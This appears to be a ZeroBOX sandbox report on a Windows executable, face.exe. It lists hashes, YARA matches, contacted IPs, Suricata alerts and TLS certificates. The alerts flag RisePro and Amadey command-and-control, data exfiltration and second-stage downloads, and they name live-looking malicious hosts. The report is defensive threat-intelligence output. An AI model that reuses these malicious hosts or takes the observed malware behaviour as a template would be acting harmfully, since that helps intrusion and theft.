Summary | ZeroBOX

face.exe

Generic Malware, Amadey, NSIS, Malicious Library, Malicious Packer, Admin Tool (Sysinternals etc ...), Antivirus, UPX, Anti_VM, AntiDebug, PNG Format, OS Processor Check, MZP Format, CHM Format, .NET EXE, JPEG Format, PE File, DLL, ZIP Format, BMP Format, AntiVM, PE32
Category FILE
Machine s1_win7_x6403_us
Started Jan. 23, 2024, 7:55 a.m.
Completed Jan. 23, 2024, 7:57 a.m.
Size 1.2MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 b367a4da8177d0be7638599aad1caa9b
SHA256 3b1c6930afaa617da6457a8bfca580e8739ef04301599e9e54f8f0bcfb194355
CRC32 B6866092
ssdeep 24576:jBLATEOrY43Fq2Be8Duj3UWn6wQLBaWnBCqtAV8nQ3v0lHGfYED:JAR1uTUHlLBaWntSeQcHGf
Yara
  • IsPE32 - (no description)
  • Malicious_Packer_Zero - Malicious Packer
  • PE_Header_Zero - PE File Signature

IP Address Status Action
104.26.4.15 Active Moloch
109.107.182.3 Active Moloch
117.18.232.200 Active Moloch
142.251.220.68 Active Moloch
154.92.15.189 Active Moloch
164.124.101.2 Active Moloch
173.194.174.84 Active Moloch
185.172.128.109 Active Moloch
185.172.128.19 Active Moloch
185.172.128.53 Active Moloch
185.172.128.90 Active Moloch
185.215.113.68 Active Moloch
193.233.132.62 Active Moloch
216.58.200.227 Active Moloch
34.117.186.192 Active Moloch
61.111.58.35 Active Moloch
87.251.77.166 Active Moloch
94.177.48.37 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 193.233.132.62:50500 -> 192.168.56.103:49165 2046266 ET MALWARE [ANY.RUN] RisePro TCP (Token) Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 104.26.4.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 193.233.132.62:50500 -> 192.168.56.103:49165 2046267 ET MALWARE [ANY.RUN] RisePro TCP (External IP) Malware Command and Control Activity Detected
TCP 192.168.56.103:49165 -> 193.233.132.62:50500 2049060 ET MALWARE Suspected RisePro TCP Heartbeat Packet A Network Trojan was detected
TCP 192.168.56.103:49165 -> 193.233.132.62:50500 2046270 ET MALWARE [ANY.RUN] RisePro TCP (Exfiltration) Malware Command and Control Activity Detected
TCP 192.168.56.103:49165 -> 193.233.132.62:50500 2046269 ET MALWARE [ANY.RUN] RisePro TCP (Activity) Malware Command and Control Activity Detected
TCP 192.168.56.103:49179 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 109.107.182.3:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 192.168.56.103:49166 -> 34.117.186.192:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49179 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49166 -> 34.117.186.192:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49179 -> 109.107.182.3:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 192.168.56.103:49166 -> 34.117.186.192:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 109.107.182.3:80 -> 192.168.56.103:49179 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 109.107.182.3:80 -> 192.168.56.103:49179 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49185 -> 173.194.174.84:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49189 -> 216.58.200.227:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49188 -> 216.58.200.227:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.215.113.68:80 -> 192.168.56.103:49194 2400020 ET DROP Spamhaus DROP Listed Traffic Inbound group 21 Misc Attack
TCP 192.168.56.103:49199 -> 142.251.220.68:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49198 -> 142.251.220.68:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49180 -> 185.215.113.68:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49180 -> 185.215.113.68:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.215.113.68:80 -> 192.168.56.103:49180 2014819 ET INFO Packed Executable Download Misc activity
TCP 185.215.113.68:80 -> 192.168.56.103:49180 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.68:80 -> 192.168.56.103:49180 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49186 -> 173.194.174.84:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49179 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 109.107.182.3:80 -> 192.168.56.103:49179 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 109.107.182.3:80 -> 192.168.56.103:49179 2014819 ET INFO Packed Executable Download Misc activity
TCP 109.107.182.3:80 -> 192.168.56.103:49179 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49200 -> 185.172.128.19:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49194 -> 185.215.113.68:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.103:49194 -> 185.215.113.68:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 185.172.128.19:80 -> 192.168.56.103:49200 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.172.128.19:80 -> 192.168.56.103:49200 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.172.128.19:80 -> 192.168.56.103:49200 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49217 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49179 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49194 -> 185.215.113.68:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.103:49222 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.215.113.68:80 -> 192.168.56.103:49194 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.68:80 -> 192.168.56.103:49194 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.68:80 -> 192.168.56.103:49194 2015744 ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) Misc activity
TCP 192.168.56.103:49228 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49229 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49230 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49231 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49232 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49233 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49234 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49236 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49237 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49242 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49239 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49245 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49246 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49244 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49194 -> 185.215.113.68:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.103:49241 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 193.233.132.62:50500 -> 192.168.56.103:49256 2046266 ET MALWARE [ANY.RUN] RisePro TCP (Token) Malware Command and Control Activity Detected
TCP 192.168.56.103:49247 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49256 -> 193.233.132.62:50500 2049060 ET MALWARE Suspected RisePro TCP Heartbeat Packet A Network Trojan was detected
TCP 192.168.56.103:49248 -> 94.177.48.37:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49253 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49238 -> 94.177.48.37:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49251 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49255 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49257 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49243 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49262 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49552 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49340 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49642 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49648 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49323 -> 94.177.48.37:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49645 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49194 -> 185.215.113.68:80 2044623 ET MALWARE Amadey Bot Activity (POST) A Network Trojan was detected
TCP 192.168.56.103:49650 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49470 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49263 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49647 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49653 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49639 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49655 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49661 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49644 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49663 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49646 -> 94.177.48.37:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49667 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49649 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49652 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49651 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49656 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49659 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49660 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49657 -> 94.177.48.37:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49662 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49674 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49676 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49668 -> 94.177.48.37:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49684 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49681 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49691 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49673 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49692 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49671 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49677 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49669 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49675 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49670 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49678 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49194 -> 185.215.113.68:80 2044623 ET MALWARE Amadey Bot Activity (POST) A Network Trojan was detected
TCP 192.168.56.103:49672 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49685 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49683 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49679 -> 94.177.48.37:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49686 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49680 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49688 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49687 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49689 -> 94.177.48.37:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49690 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49693 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49694 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49695 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49696 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49697 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49212 -> 87.251.77.166:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 87.251.77.166:80 -> 192.168.56.103:49212 2014819 ET INFO Packed Executable Download Misc activity
TCP 87.251.77.166:80 -> 192.168.56.103:49212 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 87.251.77.166:80 -> 192.168.56.103:49212 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 87.251.77.166:80 -> 192.168.56.103:49212 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49215 -> 185.172.128.90:80 2011227 ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla)) Potentially Bad Traffic
TCP 192.168.56.103:49225 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49250 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49249 -> 185.172.128.109:80 2011227 ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla)) Potentially Bad Traffic
TCP 192.168.56.103:49249 -> 185.172.128.109:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.172.128.109:80 -> 192.168.56.103:49249 2014819 ET INFO Packed Executable Download Misc activity
TCP 185.172.128.109:80 -> 192.168.56.103:49249 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.172.128.109:80 -> 192.168.56.103:49249 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49259 -> 34.117.186.192:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49259 -> 34.117.186.192:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49259 -> 34.117.186.192:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49261 -> 104.26.4.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49259 -> 34.117.186.192:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49641 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49643 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49654 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49658 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49664 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49666 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49682 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49698 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49166 -> 34.117.186.192:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49259 -> 34.117.186.192:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected

Suricata TLS

Flow | Issuer | Subject | Fingerprint
TLSv1 192.168.56.103:49168 -> 104.26.4.15:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.103:49185 -> 173.194.174.84:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=accounts.google.com | e1:91:9a:16:6f:2f:49:fb:1c:f6:d7:db:dd:f0:e2:b0:9f:34:cc:e4
TLSv1 192.168.56.103:49189 -> 216.58.200.227:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.gstatic.com | 6f:8c:8c:6f:06:bf:0d:24:7e:8d:3d:09:0d:07:26:df:c3:6e:47:c0
TLSv1 192.168.56.103:49188 -> 216.58.200.227:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.gstatic.com | 6f:8c:8c:6f:06:bf:0d:24:7e:8d:3d:09:0d:07:26:df:c3:6e:47:c0
TLSv1 192.168.56.103:49199 -> 142.251.220.68:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=www.google.com | cf:73:8c:78:50:35:aa:62:03:1d:34:01:0d:0e:90:a3:9a:5f:0d:d9
TLSv1 192.168.56.103:49198 -> 142.251.220.68:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=www.google.com | cf:73:8c:78:50:35:aa:62:03:1d:34:01:0d:0e:90:a3:9a:5f:0d:d9
TLSv1 192.168.56.103:49186 -> 173.194.174.84:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=accounts.google.com | e1:91:9a:16:6f:2f:49:fb:1c:f6:d7:db:dd:f0:e2:b0:9f:34:cc:e4
TLSv1 192.168.56.103:49217 -> 154.92.15.189:443 | C=US, O=Let's Encrypt, CN=R3 | CN=i.alie3ksgaa.com | e3:88:72:04:24:5c:12:17:a4:e2:c1:d9:33:f0:d9:60:91:71:d3:dc
TLSv1 192.168.56.103:49222 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49228 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49229 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49230 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49231 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49232 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49233 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49234 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49236 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49237 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49242 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49245 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49246 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49244 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49239 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49241 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49247 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49248 -> 94.177.48.37:443 | C=US, O=Let's Encrypt, CN=R3 | CN=fleefight.it | 91:68:1d:27:8a:cf:73:d8:08:f0:ef:b4:c6:fe:7b:6c:17:be:10:d7
TLSv1 192.168.56.103:49253 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49238 -> 94.177.48.37:443 | C=US, O=Let's Encrypt, CN=R3 | CN=fleefight.it | 91:68:1d:27:8a:cf:73:d8:08:f0:ef:b4:c6:fe:7b:6c:17:be:10:d7
TLSv1 192.168.56.103:49251 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49255 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49257 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49262 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49243 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49552 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49642 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49648 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49323 -> 94.177.48.37:443 | C=US, O=Let's Encrypt, CN=R3 | CN=fleefight.it | 91:68:1d:27:8a:cf:73:d8:08:f0:ef:b4:c6:fe:7b:6c:17:be:10:d7
TLSv1 192.168.56.103:49340 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49645 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49650 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49263 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49470 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49647 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49653 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49639 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49655 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49661 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49646 -> 94.177.48.37:443 | C=US, O=Let's Encrypt, CN=R3 | CN=fleefight.it | 91:68:1d:27:8a:cf:73:d8:08:f0:ef:b4:c6:fe:7b:6c:17:be:10:d7
